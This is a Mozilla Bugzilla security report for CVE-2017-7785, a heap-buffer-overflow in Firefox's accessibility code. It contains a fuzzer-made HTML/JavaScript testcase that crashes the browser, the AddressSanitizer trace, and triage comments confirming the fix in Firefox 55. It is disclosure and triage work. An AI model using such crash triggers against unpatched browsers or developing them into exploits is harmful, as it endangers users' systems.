Bug 1356985 (CVE-2017-7785)

heap-buffer-overflow in mozilla::a11y::DocAccessible::PutChildrenBack

VERIFIED FIXED in Firefox 55

Status

()

defect
VERIFIED FIXED
2 years ago
a year ago

People

(Reporter: nils, Assigned: surkov)

Tracking

(5 keywords)

Trunk
mozilla55
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr52 unaffected, firefox54 wontfix, firefox55 verified)

Details

(Whiteboard: [post-critsmash-triage][adv-main55+] fixed by bug 1362063)

(Reporter)

Description

2 years ago
The following testcase crashes the latest ASAN build of Firefox.

crash.html:
<script>
function start() {
	try{fuzzPriv.enableAccessibility();}catch(e){ };
	o5=document;
	o105=document.documentElement;
	document.documentElement.innerHTML="<figcaption id='id16'><style' id='id29'>";
	o252=document.createElement('audio');
	o253=document.createElement('track');
	o252.appendChild(o253);
	o5.write('<html><body><div>');
	o256=o5.all[2];
	o252.controls^=1;
	o5.documentElement.appendChild(o252);
	o5.defaultView.onerror=fun1;
	setTimeout(fun0, 4);
}
function fun0() {
	document.documentElement.style.transform='scale(0.1)';
	o348=document.createElement('style');
	o349=document.createTextNode("@import url('data:text/css,.class0{display:inline;mask-repeat:round;}')");
	o348.appendChild(o349);
	o350=document.createElement('iframe');
	try{document.documentElement.animate([{background: '-moz-element(#id4)',},{}],100);}catch(e){}
	document.documentElement.appendChild(o105);
	document.documentElement.appendChild(o350);
	document.documentElement.appendChild(o348);
	o256.classList.toggle('class0');
}
var c=0;
function fun1() {
	if(c++!=1) return;
	o314=document.createElement("form");
	document.documentElement.appendChild(o314);
	o256.id='id14';
	o350.setAttribute('aria-owns','id29 id36 id4 id4');
	o314.setAttribute('aria-owns','id52 id14 id39 id47 id54 id16 id16 id29');
}
</script>
<body onload="start()"></body>


ASAN output:
=================================================================
==6299==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001ebe28 at pc 0x7f663ff03f2a bp 0x7ffe5e40bc50 sp 0x7ffe5e40bc48
READ of size 8 at 0x6020001ebe28 thread T0 (Web Content)
    #0 0x7f663ff03f29 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77:9
    #1 0x7f663ff03f29 in Destruct /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:560
    #2 0x7f663ff03f29 in DestructRange /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2007
    #3 0x7f663ff03f29 in RemoveElementsAt /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2055
    #4 0x7f663ff03f29 in mozilla::a11y::DocAccessible::PutChildrenBack(nsTArray<RefPtr<mozilla::a11y::Accessible> >*, unsigned int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2204
    #5 0x7f663ff0492d in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2153:3
    #6 0x7f663fe70b7c in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:805:18
    #7 0x7f663d89051e in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1738:12
    #8 0x7f663d89fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #9 0x7f663d89f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #10 0x7f663d8a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #11 0x7f663d8a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #12 0x7f663d8a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #13 0x7f663e0ebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #14 0x7f6638378647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #15 0x7f6638036d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #16 0x7f6637f96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #17 0x7f6637f930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #18 0x7f6637f954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #19 0x7f6637f95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #20 0x7f66371e3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #21 0x7f66371e05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #22 0x7f6637f9de01 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #23 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #24 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #25 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #26 0x7f663d2125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #27 0x7f6640816a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #28 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #29 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #30 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #31 0x7f664081640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
    #32 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #33 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #34 0x7f665290382f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #35 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)

0x6020001ebe28 is located 8 bytes to the left of 16-byte region [0x6020001ebe30,0x6020001ebe40)
allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x7f663703f450 in Alloc /home/worker/workspace/build/src/xpcom/string/nsSubstring.cpp:242:22
    #2 0x7f663703f450 in nsAString::MutatePrep(unsigned int, char16_t**, unsigned int*) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:155
    #3 0x7f6637046fb5 in nsAString::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:217:8
    #4 0x7f6637046e05 in nsAString::ReplacePrep(unsigned int, unsigned int, unsigned int) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:207:10
    #5 0x7f663704977e in nsAString::Replace(unsigned int, unsigned int, char16_t) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:534:7
    #6 0x7f663fe6007d in mozilla::a11y::NotificationController::QueueMutationEvent(mozilla::a11y::AccTreeMutationEvent*) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:205:28
    #7 0x7f663fee54ef in mozilla::a11y::Accessible::MoveChild(unsigned int, mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/Accessible.cpp:2208:47
    #8 0x7f663ff05494 in mozilla::a11y::DocAccessible::MoveChild(mozilla::a11y::Accessible*, mozilla::a11y::Accessible*, int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2232:16
    #9 0x7f663ff0479d in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2144:9
    #10 0x7f663fe70b7c in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:805:18
    #11 0x7f663d89051e in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1738:12
    #12 0x7f663d89fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #13 0x7f663d89f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #14 0x7f663d8a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #15 0x7f663d8a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #16 0x7f663d8a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #17 0x7f663e0ebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #18 0x7f6638378647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #19 0x7f6638036d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #20 0x7f6637f96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #21 0x7f6637f930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #22 0x7f6637f954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #23 0x7f6637f95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #24 0x7f66371e3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #25 0x7f66371e05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #26 0x7f6637f9de01 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #27 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #28 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #29 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #30 0x7f663d2125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #31 0x7f6640816a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #32 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #33 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #34 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #35 0x7f664081640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77:9 in ~RefPtr
Shadow bytes around the buggy address:
  0x0c0480035770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480035780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480035790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800357a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800357b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c04800357c0: fa fa 00 00 fa[fa]00 00 fa fa 00 00 fa fa 00 00
  0x0c04800357d0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c04800357e0: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa 00 00
  0x0c04800357f0: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480035800: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480035810: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==6299==ABORTING
Group: core-security → dom-core-security
Flags: sec-bounty?
Alex, can you look into this bug?
Flags: needinfo?(surkov.alexander)
(Assignee)

Comment 2

2 years ago
it is not against trunk, isn't it? it appears patch from bug 1362063 (which tweaked this code a bit) is not on stack here
Flags: needinfo?(surkov.alexander)
Nils, it appears that this bug does not reproduce cleanly on the latest Firefox Nightly. Alexander suggested this was fixed independently in bug 1362063. Can you retest to confirm there is no other way to trigger this?
Flags: needinfo?(nils)
(Reporter)

Comment 4

2 years ago
It was against trunk when it was reported two month ago. I can confirm that it does not reproduce against the latest build.
Flags: needinfo?(nils)
Thank you for closing the loop, Nils.
I will close this bug as it was fixed unknowingly in bug 1362063.
We'll leaving the bounty decision to the committee later.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 1362063
Since the other bug is not a vulnerability, we get better tracking and testing if we make security bugs like this "Depend on" the generic bug (rewrite or whatever) and call this "FIXED" so we trigger our "does this need to land on branches" queries.
Depends on: 1362063
Flags: sec-bounty? → sec-bounty+
Resolution: DUPLICATE → FIXED
Whiteboard: fixed by bug 1362063
Indeed, is ESR52 affected?
Assignee: nobody → surkov.alexander
Flags: needinfo?(surkov.alexander)
Target Milestone: --- → mozilla55
(Assignee)

Comment 8

2 years ago
(In reply to Ryan VanderMeulen [:RyanVM] from comment #7)
> Indeed, is ESR52 affected?

It is a good question. Could someone to confirm there's a problem on branches, and if so, then I will make a backport.
Flags: needinfo?(surkov.alexander)
Group: dom-core-security → core-security-release
Nils, do you know if this affects Firefox 52 (or ESR 52)?
Flags: needinfo?(nils)
Whiteboard: fixed by bug 1362063 → [adv-main55+] fixed by bug 1362063
Alias: CVE-2017-7785
(Reporter)

Comment 10

2 years ago
Al, I can't reproduce the crash on ESR 52 and I have not seen any similar crashes on ESR while fuzzing.
Flags: needinfo?(nils)
Flags: qe-verify+
Whiteboard: [adv-main55+] fixed by bug 1362063 → [post-critsmash-triage][adv-main55+] fixed by bug 1362063
I have managed to reproduce this issue by following the testcase provided in comment 0 using Firefox 55.0a1 asan build (Build Id: 20170417195632) using Ubuntu 16.04 64bit.

This issue is no longer reproducible on Firefox 55.0 asan build (Build Id:20170731163142).
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.